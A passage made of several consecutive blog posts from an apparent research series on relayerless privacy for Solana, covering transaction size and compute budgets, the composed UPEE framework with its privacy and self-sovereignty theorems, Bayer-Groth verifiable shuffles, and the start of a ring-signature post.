| Spending key sk | `sk ← {0,1}^256` random | Master secret |
| Nullifier key nk | `Poseidon(sk, "nk")` | Derives nullifiers |
| Public key pk | `sk · G` (G ∈ BN254 𝔾_1) | Identifies note owner |
| Viewing key vk | `Poseidon(sk, "vk")` | Decrypts incoming notes |

The Solana Ed25519 keypair signs the transaction envelope (paying the on-chain fee from the privacy program's reserve). The ZK proof internally proves authorisation via the spending key. **Compromise of one does not compromise the other.**

## Transaction layout

A canonical 2-input / 2-output SPST transaction:

| Component | Size (bytes) | Notes |
|-----------|------|------|
| Groth16 proof (compressed) | 128 | via `sol_alt_bn128_compression` |
| Nullifiers (2 × 32) | 64 | Public input; checked against on-chain set |
| Output commitments (2 × 32) | 64 | Poseidon hashes |
| Merkle root | 32 | Anchors the proof to recent state |
| Fee (u64) | 8 | Public, in lamports |
| Encrypted note ciphertexts (2) | 128 | For recipient note discovery |
| Anchor instruction discriminator | 8 | Standard Anchor program |
| Account references (with ALT) | ~120 | Program ID, PDAs, system accounts |
| Ed25519 signature | 64 | Transaction-level auth |
| Transaction headers | ~40 | Recent blockhash, message header |
| **Total** | **~656** | **Within 1,232-byte limit** |

**Headroom: ~576 bytes.** Enough for:

- A second Groth16 proof (composed PPST + SPST).
- A 4-input / 4-output transaction instead of 2-in / 2-out.
- Ring signature of size ~17 (instead of 64-byte simple Ed25519 sig) for in-tx anonymity.

Under SIMD-0296 (4,096 bytes), the headroom triples.

## Compute unit budget

| Operation | CU cost | Source |
|-----------|---------|--------|
| Groth16 verification (3 pairings + public-input MSMs) | ~150,000 | groth16-solana benchmarks |
| Nullifier set check (2 PDA reads + comparison) | ~50,000 | Compressed account lookups |
| Merkle root validation (1 PDA read) | ~10,000 | Light Protocol root cache |
| Note insertion + state updates (compressed account write via CPI) | ~20,000 | ZK Compression v2 batched updates |
| Borsh deserialization | ~5,000 | Standard overhead |
| **Total** | **~235,000** | **16.8% of 1.4M CU limit** |

Headroom: 1,165,000 CU. Enough for:

- A second Groth16 verification (composed PPST + SPST): +150K → total 385K CU (27.5% of limit).
- Auxiliary in-program Poseidon hashing via `sol_poseidon` for state derivations.
- CPI calls to external programs (token transfers for unshielding, swap execution for atomic private DEX).

## Existing infrastructure used

| Infrastructure | Integration point | Status |
|---------------|-------------------|--------|
| [Light Protocol / ZK Compression](https://www.zkcompression.com/resources/whitepaper) | Merkle tree state, compressed accounts | Production (mainnet) |
| [`groth16-solana`](https://github.com/Lightprotocol/groth16-solana) verifier | Groth16 verification crate | Production |
| `sol_poseidon` syscall | In-program Poseidon hashing | Live (mainnet, v1.16+) |
| `sol_alt_bn128_group_op` syscalls | BN254 group ops for proof verification | Live (mainnet, v1.16+) |
| `sol_alt_bn128_compression` | G1/G2 point compression | Live (mainnet) |
| Address Lookup Tables | Compact account references | Production |
| SIMD-0296 (4,096-byte transactions) | Extended tx envelope for ring sigs / PPST | Approved Q4 2025; pending activation |

The protocol is **deployable today** with the legacy 1,232-byte transaction format. SIMD-0296 makes it more comfortable but isn't a hard prerequisite.

## What we still need from Solana

For full F_RP, two SIMDs are nice-to-have:

### SIMD-0302 (BN254 G2 arithmetic syscall)

Currently in Review. Adds native G2 scalar multiplication and addition. Without it, full PLONK / KZG verification on-chain is expensive (G2 ops in the BPF VM). With it, F_RP can switch to a universal SRS that doesn't need a per-circuit Groth16 ceremony.

Estimated impact: PLONK verification ~400–600K CU vs Groth16's ~150K. Larger but eliminates per-circuit ceremony. Worthwhile tradeoff for a multi-program ecosystem.

### Re-activation of the ZK ElGamal Proof Program

Currently disabled following the Phantom Challenge bug (Fiat-Shamir transcript missing a hash input — June 2025). When re-activated, F_RP can lean on the existing native sigma-proof / Bulletproofs verifier for some sub-protocols. Until then, all proofs go through the BN254 Groth16 path.

## End-to-end latency budget

For a 2-in / 2-out SPST transaction on commodity hardware:

| Phase | Time | Notes |
|-------|------|-------|
| Read on-chain state (Merkle root + recent blockhash) | ~50 ms | RPC roundtrip |
| Local proof generation (Apple M2, 8-core) | **0.5–1.5 s** | Dominated by FFT + MSM |
| Transaction broadcast | ~50 ms | Direct to validator RPC |
| Slot inclusion + finality | ~600 ms | Solana block time + confirmation |
| **Total user-perceived latency** | **~1.5–3 s** | |

Most of the latency is *prover time*, not chain time. A GPU prover (ICICLE on RTX 4090) drops this to ~300 ms. Browser-side proving via wasm-bindgen-rayon is workable but slower (~5–8 s) — discussed in [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/).

## What runs on the validators is intentionally boring

On the chain side, F_RP is just three things:

1. A Solana program (Anchor-based) that verifies Groth16 + nullifier checks + state updates.
2. A Light Protocol-compatible Merkle tree state.
3. An on-chain account holding the protocol's lamport reserve (replenished from shield deposits, drained by validator fee extractions).

That's it. No relayers, no off-chain operators, no governance multisig (other than for emergency pause). The boring deployment surface is the point.

## Bibliography

- Light Protocol. *ZK Compression Whitepaper.* https://www.zkcompression.com/resources/whitepaper
- Light Protocol. *groth16-solana on-chain verifier.* https://github.com/Lightprotocol/groth16-solana
- Helius. *Zero-Knowledge Proofs: Applications on Solana.* https://www.helius.dev/blog/zero-knowledge-proofs-its-applications-on-solana
- Solana Foundation. *Transactions documentation.* https://solana.com/docs/core/transactions
- Solana Foundation. *SIMD-0296: Larger Transaction Format.* https://github.com/solana-foundation/solana-improvement-documents/blob/main/proposals/0296-larger-transactions.md
- Solana Foundation. *SIMD-0302 (Review): BN254 G2 Arithmetic Syscalls.* https://github.com/solana-foundation/solana-improvement-documents/discussions/293
- Aztec Documentation. *Indexed Merkle Tree (Nullifier Tree).* https://docs.aztec.network/
- Grassi, L., Khovratovich, D., Rechberger, C., Roy, A., Schofnegger, M. (2021). *Poseidon.* USENIX Security 2021. https://eprint.iacr.org/2019/458
- Pedersen, T. P. (1991). *Non-Interactive and Information-Theoretic Secure Verifiable Secret Sharing.* CRYPTO 1991.

Previous: [UPEE: composing the framework ←](/blog/upee_universal_private_execution/) · Next: [F_RP vs the rest →](/blog/f_rp_vs_existing_privacy_systems/)


---

# UPEE: composing SPST + PPST + TAB into one framework

Canonical: https://blog.skill-issue.dev/blog/upee_universal_private_execution/
Description: F_RP Construction IV. The five-algorithm tuple Setup/Deploy/Invoke/Verify/Finalize plus the simulation-based privacy theorem (3.12) and self-sovereignty theorem (3.13). The composition that makes the whole thing deployable.
Published: 2026-05-08T16:00:00.000Z
Tags: zk, cryptography, privacy, simulation-security, uc-framework, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

[SPST](/blog/spst_self_paying_shielded_transactions/) gave us self-paying private value transfer. [PPST](/blog/ppst_private_programmable_state/) extended it to arbitrary computation. [TAB](/blog/tab_threshold_anonymous_broadcast/) and [verifiable shuffles](/blog/verifiable_shuffles_for_privacy/) closed the submitter-identification gap. Each of those is a self-contained construction. This post is about how they compose into the **deployable framework**.

UPEE — the Universal Private Execution Environment — is a five-tuple `(Setup, Deploy, Invoke, Verify, Finalize)` that wraps the lower-level pieces in a single deployable interface. By the end of this post we'll have stated the two main theorems of F_RP — simulation-based privacy and self-sovereignty — and shown how they fall out of the composition.

This is post 7 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series.

<Aside kind="note">
This is the post that took the longest to write. The simulation-based privacy proof requires four cryptographic-assumption transitions stitched into one hybrid argument. I've kept it sketchy in the prose; the full per-hybrid analysis is in the paper.
</Aside>

## The five algorithms

**`Setup(1^λ) → pp`.** Generate public parameters: SRS for the proof system (universal KZG or transparent FRI), Poseidon parameters, Merkle tree depth `d = 32`, Pedersen generators `G, H`, range-proof bit-length `ℓ_v = 64`, field `𝔽_p`.

**`Deploy(C, pp) → vk_C`.** Compile a private program circuit `C` to an R1CS (or PLONKish) constraint system, run the proof system's key generator to produce `(pk_C, vk_C)`, register `vk_C` on-chain at a deterministic PDA `addr_C = PDA("UPEE", H(vk_C))`.

**`Invoke(C, state_priv, input_priv, pp) → (tx, π)`.** Client-side, no chain interaction. Read current Merkle root, execute `C` locally on private state, build the witness, generate the Groth16 proof, assemble the transaction with encrypted note ciphertexts.

**`Verify(vk_C, tx, π) → {0, 1}`.** On-chain. Single Groth16 pairing check + nullifier-set check + recent-root check + minimum-fee check.

**`Finalize(σ, tx) → σ'`.** State transition. Insert nullifiers, append commitments to the Merkle tree, credit the validator with `f`.

## Hybrid proof architecture (§3.4.2)

A single Groth16 proof can't directly hold a Turing-complete program at scale. Big circuits → big provers. The fix is **recursive composition**:

<Mermaid id="hybrid-proof" code={`graph LR
  A[User executes private program<br/>locally in PXE-style env] --> B[Inner STARK / Nova proof<br/>~big circuit, transparent setup]
  B --> C[Wrap inner proof in Groth16<br/>verify_inner = 1 inside outer circuit]
  C --> D[128-byte Groth16 proof<br/>on-chain via alt_bn128]
  classDef step stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
  class A,B,C,D step
`}/>

The outer Groth16 proof's circuit verifies the inner STARK or Nova accumulator. Composed soundness:

$$
\epsilon_{\mathrm{hybrid}} \;\leq\; \epsilon_{\mathrm{inner}} + \epsilon_{\mathrm{outer}} + \mathsf{negl}(\lambda).
$$

Concretely: STARK with FRI gives `ε_inner ≤ 2^{-100}` for the standard 30-query / blowup-4 parameters; Groth16 gives `ε_outer ≤ 2^{-100}` under q-PKE on BN254. Combined `ε_hybrid ≤ 2^{-100}` — no meaningful soundness loss.

Zero-knowledge composes too: outer Groth16 reveals nothing about the inner STARK; the inner STARK reveals nothing about the witness. Both layers contribute ZK and they don't fight.

## The ideal functionality `F_RP`

For the simulation-based proof we need a target. The ideal functionality:

- On `(invoke, sid, C, state_priv, input_priv)` from user `U`:
  1. Execute `C` locally, validate balance / range / membership.
  2. Compute fee `f`.
  3. Send `(transaction, sid, f)` to the adversary `A`. *That's all `A` learns.*
  4. On `proceed` from `A`, update ideal state, ack to `U`.

- On `(query, sid)` from `A`: return `(rt, N, f)` (the public state).

`F_RP` never tells `A`:
- which notes were consumed (only nullifiers);
- which notes were created (only commitments);
- the values, recipients, or program inputs;
- the user's identity beyond what the fee `f` and the fact-of-existence reveal.

This is the **only** thing the adversary should be able to learn in the real world either.

## Theorem 3.12 — simulation-based privacy

**Statement.** For any PPT adversary `A` controlling the blockchain (full read of on-chain data, validator-side scheduling, transaction ordering), there exists a PPT simulator `S` such that:

$$
\bigl\{\,\mathsf{View}_{\mathcal{A}}(\mathsf{Real}(\mathcal{A}, \mathcal{F}_{\mathrm{RP}}))\,\bigr\}
\;\approx_c\;
\bigl\{\,\mathsf{View}_{\mathcal{A}}(\mathsf{Ideal}(\mathcal{A}, \mathcal{S}))\,\bigr\}
$$

where `S` learns only `(sid, f)` from `F_RP`.

**Proof outline.**

The simulator builds a fake transaction that is computationally indistinguishable from a real one without ever seeing the witness:

1. **Simulated nullifiers.** For each of `n_in` inputs, sample `nf_i` uniformly at random, verify it isn't already in `N`, retry on collision.
2. **Simulated commitments.** For each of `n_out` outputs, sample `r_j` uniformly and set `cm_j = Poseidon(r_j)`. Indistinguishable from real commitments by the hiding property of Poseidon.
3. **Simulated proof.** Invoke the ZK simulator of the hybrid proof system: `π̃ ← Sim_ZK(vk_C, x̃)` for `x̃ = ({nf_i}, {cm_j}, rt, f)`. For Groth16, `Sim_ZK` uses the simulation trapdoor `(α, β, γ, δ)` from the CRS to forge a valid-looking proof without a witness.
4. **Simulated encrypted notes.** For each output, sample a uniform-random ciphertext of the right length. Indistinguishable by CCA2 of the encryption scheme.

The hybrid argument moves from the real distribution to the simulator's output through four hybrids, each indistinguishable from the previous one under one cryptographic assumption:

- `H_0` → `H_1`: replace real proof with simulated proof. Bound: `ZK advantage of Π_hybrid`.
- `H_1` → `H_2`: replace real commitments with random `Poseidon(r̃_j)`. Bound: `n_out · PRF advantage of Poseidon`.
- `H_2` → `H_3`: replace real nullifiers with uniform random values. Bound: `n_in · PRF advantage`.
- `H_3` → `H_4 = Sim`: replace real ciphertexts with random strings. Bound: `n_out · CCA2 advantage of the encryption scheme`.

By the triangle inequality, the total distinguishing advantage is the sum of four negligible quantities — itself negligible. ∎

## Theorem 3.13 — self-sovereignty

This is the result that makes F_RP *relayerless*.

**Game `Game_RF(A, λ)`.** Single honest user `U`. `A` controls all relayers, all other users, the entire network layer (delay/reorder/drop), and all off-chain infrastructure. `U` has a shielded note, the corresponding spending key, the ability to read the chain, and direct network access to at least one honest validator. `Game_RF = 1` if `U` successfully completes withdrawal of `v' ≤ v` to a public address of their choosing, paying `f` from the shielded balance, in a polynomial number of steps.

**Statement.**

$$
\Pr[\mathsf{Game}_{\mathrm{RF}}(\mathcal{A}, \lambda) = 1] \;=\; 1 - \mathsf{negl}(\lambda).
$$

**Proof.** Walk through every phase of the withdrawal and confirm the user can do it alone:

| Operation | Required resources | External party? |
|-----------|-------------------|-----------------|
| Read Merkle root | RPC (or direct ledger read) | No — public data |
| Compute Merkle path | Local tree + on-chain commitment data | No |
| Compute nullifier `PRF_sk(ρ)` | Local secret key | No |
| Build witness | Local | No |
| Generate Groth16 proof | Local CPU/GPU | No |
| Sign tx | Local Ed25519 key (or TAB share) | No |
| Broadcast tx | Direct connection to ≥1 honest validator | No (chain liveness) |
| Pay fee `f` | Inside the proof — extracted from shielded balance | **No (SPST)** |

Every row's "External party?" is "No". The single assumption is **`(Δ, p_live)`-liveness of the chain**: any valid transaction is included within Δ blocks with probability ≥ 1 − negl(λ). On Solana, `Δ ≈ 1-2 slots` (sub-second finality) and `p_live` is bounded by Tower BFT's safety guarantees.

The success probability is:

$$
\Pr[\mathsf{Game}_{\mathrm{RF}} = 1] \;=\; \Pr[\text{liveness holds}] \cdot \Pr[\text{honest proof verifies}] \;=\; (1 - \mathsf{negl}(\lambda)) \cdot 1.
$$

The second factor is `1` by completeness of the proof system. ∎

**Corollary (Censorship Resistance).** No adversary can prevent the user from exercising their private withdrawal right, assuming only chain liveness. This is strictly stronger than every relayer-dependent protocol, where adversarial control of the relayer set is sufficient to deny service.

## Composability of UPEE programs

Three composition modes from §3.4.5:

### Sequential composition `P_A ; P_B`

Run `P_A` to commit intermediate state, wait for finality, then run `P_B` consuming that state. Soundness composes additively:

$$
\epsilon_{\mathrm{seq}} \;\leq\; \epsilon_A + \epsilon_B + \mathsf{negl}(\lambda).
$$

### Parallel composition `P_A ‖ P_B`

Both programs run in the same transaction over disjoint state. Combined circuit `C_{A‖B}` satisfies iff both `C_A` and `C_B` do. Soundness:

$$
\epsilon_{A \| B} \;\leq\; \epsilon_A + \epsilon_B + \mathsf{negl}(\lambda).
$$

### Nested composition `P_A[P_B]`

`P_A` calls `P_B` as a subroutine. State passes through Pedersen-committed values:

$$
\mathsf{call}(P_B, \mathsf{Com}(\vec{\mathrm{args}}), \pi_{\mathrm{args\_valid}}) \;\to\; (\mathsf{Com}(\vec{\mathrm{result}}), \pi_{\mathrm{exec}}).
$$

The caller verifies `π_exec` recursively inside its own circuit. Soundness includes a recursion-overhead term:

$$
\epsilon_{\mathrm{nested}} \;\leq\; \epsilon_A + \epsilon_B + \epsilon_{\mathrm{recursive}} + \mathsf{negl}(\lambda).
$$

`ε_recursive` is bounded by Theorem 3.8 (composed soundness of the hybrid proof architecture).

## Summary of security properties

<TradeoffTable rows={[
  { aspect: 'Simulation-based privacy', pros: 'Theorem 3.12 — adversary learns only (fact of tx, fee).', cons: 'Requires ZK of Π_hybrid + Poseidon PRF + nullifier PRF + CCA2 encryption.' },
  { aspect: 'Self-sovereignty',          pros: 'Theorem 3.13 — works against any adversary controlling all but the user.', cons: 'Requires only chain liveness.' },
  { aspect: 'Sequential composability', pros: 'Theorem 3.14 — multi-step private workflows.', cons: 'Requires intermediate finality.' },
  { aspect: 'Parallel composability',    pros: 'Theorem 3.15 — atomic two-program transactions.', cons: 'Requires disjoint state.' },
  { aspect: 'Nested composability',      pros: 'Theorem 3.16 — private function calls between programs.', cons: 'Requires recursive proof verification (cost ~30K constraints).' },
  { aspect: 'Composed soundness',        pros: 'Theorem 3.8 — hybrid proof architecture.', cons: 'Loose by epsilon_inner + epsilon_outer.' },
  { aspect: 'Ring anonymity',            pros: 'Theorem 3.9 — perfect (ROM).', cons: 'Linear in ring size.' },
  { aspect: 'TAB privacy',               pros: 'Theorem 3.10 — perfect under DDH on Ed25519.', cons: 'Constant-size sig but DKG cost.' },
  { aspect: 'Shuffle privacy',           pros: 'Theorem 3.11 — DDH + ZK of Bayer-Groth.', cons: 'Off-chain coordination.' },
]}/>

## What's left

We have the framework. We have the theorems. The question now is: does this actually fit on Solana? The next post drops the abstract `Π_hybrid` and gives concrete numbers — proof sizes in bytes, verification costs in CU, transaction layouts inside the 1,232-byte limit.

## Bibliography

- Canetti, R. (2001). *Universally Composable Security: A New Paradigm for Cryptographic Protocols.* FOCS 2001.
- Goldwasser, S., Micali, S., Rackoff, C. (1985). *The Knowledge Complexity of Interactive Proof-Systems.* STOC 1985.
- Groth, J. (2016). *On the Size of Pairing-Based Non-Interactive Arguments.* EUROCRYPT 2016.
- Ben-Sasson, E. et al. (2018). *Scalable, transparent, and post-quantum secure computational integrity (STARKs).* https://eprint.iacr.org/2018/046
- Kothapalli, A., Setty, S., Tzialla, I. (2022). *Nova: Recursive Zero-Knowledge Arguments from Folding Schemes.* https://eprint.iacr.org/2021/370

Previous: [Verifiable shuffles ←](/blog/verifiable_shuffles_for_privacy/) · Next: [Solana instantiation: 656 bytes →](/blog/solana_instantiation_656_bytes/)


---

# Bayer-Groth verifiable shuffles for network-layer privacy

Canonical: https://blog.skill-issue.dev/blog/verifiable_shuffles_for_privacy/
Description: F_RP Construction III, Approach C. Bayer-Groth verifiable shuffles obscure the input→output permutation of a batch with O(√n) proof size — used to cascade-mix pre-broadcast batches at the network layer.
Published: 2026-05-06T15:00:00.000Z
Tags: zk, cryptography, shuffles, mixnet, privacy, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

[Ring signatures and TAB](/blog/tab_threshold_anonymous_broadcast/) hide the submitter on-chain. They don't hide the **packet**: the TCP/QUIC frame that hits a Solana RPC node still has a source IP, a timing signature, and a propagation pattern. A passive adversary running a handful of nodes can do timing triangulation to identify which IP first broadcast a transaction, and that IP is enough to undo the cryptographic anonymity.

This is post 6 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. The construction here addresses the network layer with **verifiable shuffles** — a primitive that lets a third party shuffle and re-randomise a batch of encrypted transactions without learning the permutation, then prove they did so honestly.

<Aside kind="note">
This is one of three approaches to the network-layer leak. The other two are Tor / I2P (works today, requires user-side configuration) and Dandelion++ (requires P2P-network-layer changes; Monero ships it). Verifiable shuffles complement those rather than replacing them.
</Aside>

## What a verifiable shuffle is

A vector of ElGamal ciphertexts arrives at a "shuffler" — a party (or chain of parties) that:

1. Permutes the order of the ciphertexts.
2. Re-randomises each ciphertext (changes the encryption randomness without changing the plaintext).
3. Outputs a new vector that is provably a permutation-and-re-randomisation of the input.

Crucially, the shuffler's permutation π is **secret**. The proof attests "this output is some valid shuffle of the input" without revealing which one.

**Definition.** Let `vec(C) = (C_1, ..., C_n)` be ElGamal ciphertexts encrypting messages `M_i` under a common public key `pk_dec`. A verifiable shuffle protocol produces:

$$
\big(\,\vec{C}',\ \pi_{\mathrm{shuffle}}\,\big) \;\leftarrow\; \mathsf{Shuffle}(\vec{C}, \mathsf{pk}_{\mathrm{dec}})
$$

where `vec(C')` is a re-randomised permutation of `vec(C)` and the proof `π_shuffle` allows public verification without revealing π.

For each `i ∈ [n]`:

$$
C'_i \;=\; C_{\pi^{-1}(i)} + (r'_i \cdot G,\ r'_i \cdot \mathsf{pk}_{\mathrm{dec}})
$$

with `r'_i` sampled fresh.

## Bayer-Groth shuffle argument

The Bayer-Groth construction [BG12] gives an honest-verifier zero-knowledge argument with **O(√n) proof size**. The pieces:

### 1. Permutation matrix commitment

The shuffler commits to the permutation matrix `M_π ∈ {0,1}^{n×n}` using a Pedersen vector commitment:

$$
\mathsf{Com}(\vec{a}) \;=\; \sum_{i=1}^n a_i \cdot H_i \;+\; r \cdot G,
$$

where `vec(a)` encodes the permutation and `H_1, ..., H_n` are independent generators.

### 2. Multi-exponentiation argument

For a verifier challenge `vec(x) = (x_1, ..., x_n)`, the shuffler proves:

$$
\prod_{i=1}^n (C_i)^{x_{\pi(i)}} \cdot \mathsf{rerand} \;=\; \prod_{i=1}^n (C'_i)^{x_i}.
$$

This is a batched ElGamal homomorphism check that requires the shuffle to be a valid permutation with correct re-randomisation.

### 3. Permutation argument (Schwartz-Zippel)

The committed `(a_1, ..., a_n)` form a permutation of `(1, ..., n)` if and only if the polynomial identity

$$
\prod_{i=1}^n (a_i - x) \;=\; \prod_{i=1}^n (i - x)
$$

holds. The shuffler proves it by evaluating both sides at a random verifier-supplied `x`. Two degree-`n` polynomials that agree at a random point are identical with overwhelming probability.

### Sublinear proof via recursive blocks

Bayer-Groth's main contribution is the recursive block structure that pushes proof size to O(√n). Split the n elements into √n blocks of √n; commit to each block; recurse. Verifier cost remains O(n) multi-scalar multiplications for the main check, plus O(√n) pairings/exponentiations for the permutation argument.

## Theorem 3.11 — shuffle privacy

**Statement.** Under the DDH assumption on the underlying group and the zero-knowledge property of the Bayer-Groth argument, for any two permutations `π_0, π_1 ∈ S_n` and any PPT adversary observing `(vec(C), vec(C'), π_shuffle)`:

$$
\bigl|\,\Pr[\mathcal{A}(\vec{C}, \mathsf{Shuffle}_{\pi_0}(\vec{C}), \pi_{\mathrm{shuffle}}) = 1]
\;-\; \Pr[\mathcal{A}(\vec{C}, \mathsf{Shuffle}_{\pi_1}(\vec{C}), \pi_{\mathrm{shuffle}}) = 1]\,\bigr|
\;\leq\; \mathsf{Adv}^{\mathsf{DDH}}_{\mathcal{A}}(\lambda) + \mathsf{negl}(\lambda).
$$

**Proof sketch.** Reduce permutation identification to DDH. The reduction `B` receives a DDH challenge `(G, A = a·G, B = b·G, Z)` and sets `pk_dec = A`. To simulate the shuffle:

- If `Z = ab·G` (real DDH tuple): `B` re-randomises position `i` using `r'_i = b` and the DDH structure correctly produces a valid shuffle under `π_0`.
- If `Z` is uniform random: the re-randomisation introduces a random group element, making the shuffled ciphertexts independent of any specific permutation.

`B` wins with `1/2 + ε/2` if `D` distinguishes shuffles with advantage ε. The proof itself is zero-knowledge by Bayer-Groth, leaking no additional information about π beyond what is already in `(vec(C), vec(C'))`. ∎

## Cascade shuffles

If `k` independent shufflers each shuffle in sequence, the adversary must corrupt **all `k`** to learn the overall permutation:

$$
\mathsf{Adv}^{\mathrm{perm}}_{\mathrm{cascade}} \;\leq\; \prod_{j=1}^k \mathsf{Adv}^{\mathsf{DDH}}_j + k \cdot \mathsf{negl}(\lambda).
$$

This is the standard mix-net argument — one honest shuffler is enough. A cascade of three shufflers means the adversary needs to compromise all three to deanonymise.

## Integration with F_RP

<Mermaid id="shuffle-integration" code={`graph LR
  U1[User 1] --> E1[ElGamal encrypt]
  U2[User 2] --> E2[ElGamal encrypt]
  Un[User n] --> En[ElGamal encrypt]
  E1 --> S1[Shuffler 1<br/>π_1, prove]
  E2 --> S1
  En --> S1
  S1 --> S2[Shuffler 2<br/>π_2, prove]
  S2 --> S3[Shuffler 3<br/>π_3, prove]
  S3 --> D[Threshold decrypt]
  D --> C[Solana RPC]
  classDef user stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
  classDef mix  stroke:#facc15,stroke-width:2px,fill:#0a0a0a,color:#fff
  class U1,U2,Un user
  class S1,S2,S3 mix
`}/>

The shuffle network sits **between the user and the Solana RPC**. Workflow:

1. User encrypts their SPST/PPST transaction under a shared public key `pk_dec` (held by a threshold-decrypter set).
2. User submits the ciphertext to a public mempool shared with other privacy-protocol users.
3. Shufflers (a chain of 2-5 independent operators) take the batch, shuffle, re-randomise, prove.
4. After the cascade, threshold-decrypter set decrypts the final shuffled ciphertexts.
5. Decrypted transactions are submitted to Solana validators directly.

The validators see no IP / timing correlation back to the originating user. The shufflers see ciphertexts but not plaintexts. The threshold decrypter sees plaintexts but not the originator-to-position mapping.

## Tradeoffs vs. ring signatures + TAB

<TradeoffTable rows={[
  { aspect: 'Anonymity guarantee',
    pros: 'Shuffle batch of n: any of n could be any. With cascade, anonymity scales with batch size.',
    cons: 'Requires off-chain coordination (mempool, shuffler discovery, threshold decrypter)' },
  { aspect: 'Latency overhead',
    pros: 'Ring + TAB: zero (just sign).',
    cons: 'Shuffle: 1-3 round-trips through mix network; ~seconds to minutes for batching' },
  { aspect: 'Trust model',
    pros: 'Shuffle: at least one honest shuffler.',
    cons: 'TAB: at least one honest DKG participant. Ring: no trust.' },
  { aspect: 'Throughput',
    pros: 'Ring + TAB: per-tx, no batching needed.',
    cons: 'Shuffle: batched; small batches → small anon set; large batches → high latency.' },
  { aspect: 'Network-layer leak',
    pros: 'Shuffle: actually closes it (the IP-source observer learns nothing).',
    cons: 'Ring + TAB: still leaks IP unless paired with Tor/I2P.' },
]}/>

Shuffles and TAB compose. The recommended stack:

1. **TAB** (or ring sig) for on-chain submitter anonymity.
2. **Shuffle cascade** for network-layer source-IP anonymity.
3. **Tor/I2P/Dandelion++** as belt-and-braces for IP-level anonymity even against in-mempool observers.

## Practical anonymity bounds

For a TAB group of `n_tab = 100` and a shuffle cascade of size `n_shuffle = 50`, with a network-leakage parameter `μ ∈ [0, 1]` capturing how much side-channel info bleeds through:

$$
H(\mathrm{submitter}) \;\geq\; \log_2(n_{\mathrm{tab}}) + (1 - \mu) \cdot \log_2(n_{\mathrm{shuffle}}) - \mathsf{negl}(\lambda).
$$

With `μ = 0.3` (moderate leakage from timing patterns), this gives roughly 6.6 + 0.7·5.6 ≈ 10.5 bits of effective anonymity — about 1500 indistinguishable submitters. With `μ = 0` (Tor + Dandelion++), 12.2 bits ≈ 4700 submitters.

## Why this isn't deployed yet

Shufflers are operational infrastructure. Each one is:

- A long-running Linux process holding a Bayer-Groth proof generator.
- Interactive with other shufflers and the threshold-decrypter set.
- Subject to liveness assumptions (one going offline pauses the cascade, but doesn't break privacy).

For F_RP's first deployment we ship without shufflers — TAB plus user-side Tor is enough for the initial threat model. The shuffle network is a Phase 2 hardening, designed to neutralise nation-state-level network observers.

## Bibliography

- Bayer, S., Groth, J. (2012). *Efficient Zero-Knowledge Argument for Correctness of a Shuffle.* EUROCRYPT 2012.
- Chaum, D. (1981). *Untraceable Electronic Mail, Return Addresses, and Digital Pseudonyms.* CACM 24(2).
- Fanti, G. et al. (2018). *Dandelion++: Lightweight Cryptocurrency Networking with Formal Anonymity Guarantees.* SIGMETRICS 2018.
- Monero Project. *Tor and I2P integration in monerod (master).* https://github.com/monero-project/monero/blob/master/docs/ANONYMITY_NETWORKS.md

Previous: [TAB: ring sigs and FROST ←](/blog/tab_threshold_anonymous_broadcast/) · Next: [UPEE: composing the framework →](/blog/upee_universal_private_execution/)


---

# TAB: hiding the submitter with ring signatures and FROST

Canonical: https://blog.skill-issue.dev/blog/tab_threshold_anonymous_broadcast/
Description: F_RP Construction III. ZK proofs hide the contents but the wrapping Solana tx still leaks the submitter pubkey. TAB closes that gap with a Fujisaki-Suzuki ring signature and a FROST threshold Schnorr over Ed25519.
Published: 2026-05-04T16:30:00.000Z
Tags: zk, cryptography, ring-signatures, frost, monero, anonymity, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

[SPST](/blog/spst_self_paying_shielded_transactions/) hides what value moved. [PPST](/blog/ppst_private_programmable_state/) hides what program ran. Neither hides **who submitted the transaction**. On any chain that requires a signature on the outer transaction (Solana, Ethereum, Aptos, Sui — all of them), the public key of the submitter is right there in the transaction header.

Without a relayer, the submitter must sign with their own key. The Ed25519 public key tells the chain exactly which private actor authorised the proof. ZK on the inside; perfect plaintext on the outside.

This is post 5 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. Here we close the submitter-identification gap with two complementary network-layer primitives.

<Aside kind="note">
This is the part where most "privacy on Solana" pitches give up and add a relayer. We don't. The TAB construction gives us submitter anonymity without giving up self-sovereignty.
</Aside>

## The submitter identification problem, formally

**Definition (Active Participant Set).** $\mathcal{S} = \{(\mathsf{pk}_i, \mathsf{sk}_i)\}_{i=1}^N$ — the set of active F_RP participants at a given epoch. Each holds a Curve25519 keypair registered on chain.

**Definition (Anonymity Set Reduction Attack).** Adversary $\mathcal{A}$ with full read access to $\sigma$. Define:

$$
\mathcal{A}_{\text{eff}}(\mathsf{tx}) = \{\, i \in \mathcal{S} : \Pr[\text{participant } i \text{ submitted } \mathsf{tx} \mid \mathsf{View}_{\mathcal{A}}] > 0 \,\}.
$$

Naive relayerless setting: $|\mathcal{A}_{\text{eff}}| = 1$. Ed25519 signatures are strongly unforgeable — there is exactly one $\mathsf{pk}_i$ that verifies. Conditional entropy:

$$
H(\text{submitter} \mid \mathsf{View}_{\mathcal{A}}) \;=\; 0.
$$

Worst possible. Even though the *contents* of the transaction (the SPST/PPST proof) reveal nothing about which notes were spent, the submitter's pubkey reveals exactly who authorised the spend. Off-chain metadata (IP, timing, prior-deposit history, exchange KYC) collapses any remaining anonymity.

## Approach A — Fujisaki-Suzuki ring signature over Ed25519

Adapt the linkable ring signature framework of Fujisaki and Suzuki (2007) to the Ed25519 group. Let $\mathbb{G}$ be the prime-order Ed25519 subgroup with generator $G$ and order $\ell$. Two random oracles: $\mathsf{H}_p : \{0,1\}^* \to \mathbb{Z}_\ell$ and $\mathsf{H}_G : \{0,1\}^* \to \mathbb{G}$.

**Sign** with ring $R = \{\mathsf{pk}_1, \ldots, \mathsf{pk}_n\}$ at signer index $s$:

1. **Key image.** $I = \mathsf{sk}_s \cdot \mathsf{H}_G(\mathsf{pk}_s)$ — deterministic linkability tag, hides $s$.
